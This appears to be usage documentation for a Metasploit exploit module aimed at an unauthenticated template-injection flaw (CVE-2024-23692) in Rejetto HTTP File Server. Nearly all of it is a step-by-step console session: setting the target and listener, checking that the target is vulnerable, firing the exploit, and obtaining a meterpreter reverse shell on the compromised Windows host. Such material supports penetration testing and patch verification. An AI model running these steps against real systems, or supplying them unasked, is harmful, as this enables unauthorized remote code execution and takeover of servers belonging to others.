An unauth SSTI in the Rejetto HTTP File Server (HFS).

Original finder PoC: https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/

Tested against versions: 2.4.0 RC7, 2.3m

Example usage:

msf6 > use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RHOSTS 192.168.1.5
RHOSTS => 192.168.1.5
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RPORT 80
RPORT => 80
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > check
[+] 192.168.1.5:80- The target is vulnerable. Rejetto HFS version 2.4.0 RC7
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LHOST eth0
LHOST => eth0
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > exploit

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Rejetto HFS version 2.4.0 RC7
[*] Sending stage (201798 bytes) to 192.168.1.5
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.5:43508) at 2024-07-10 09:30:44 +0103

meterpreter > getuid
Server username: test_server\john
meterpreter >